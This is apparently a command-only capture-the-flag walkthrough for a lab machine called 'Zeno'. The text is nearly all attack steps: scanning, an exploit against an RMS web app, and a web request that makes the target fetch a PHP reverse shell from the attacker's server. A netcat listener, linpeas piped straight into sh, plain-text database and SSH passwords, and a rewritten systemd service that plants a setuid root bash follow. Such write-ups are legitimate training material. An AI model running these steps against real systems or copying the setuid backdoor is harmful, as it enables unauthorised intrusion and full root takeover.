Zeno
Last updated
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM:12340 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtpython exploit.py http://$VICTIM:12340/rms/git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php python2 -m SimpleHTTPServer 81http://$VICTIM:12340/rms/images/reverse-shell.php?cmd=curl%20-O%20http://10.10.57.58:81/php-reverse-shell.phpnc -lvnp 1337python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgwget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81cd /tmp/
curl -O http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.shmysql -u root -pveerUffIrangUfcubyigshow databases;
use dbrms;
show tables;
select * from members;ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJasudo -lfind /etc -type f -perm /g=w -exec ls -l {} + 2> /dev/null vi /etc/systemd/system/zeno-monitoring.service[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/bash_root; chmod +xs /home/edward/bash_root'
[Install]
WantedBy=multi-user.targetsudo /usr/sbin/rebootssh edward@$VICTIM
Password: FrobjoodAdkoonceanJals -lah
./bash_root -p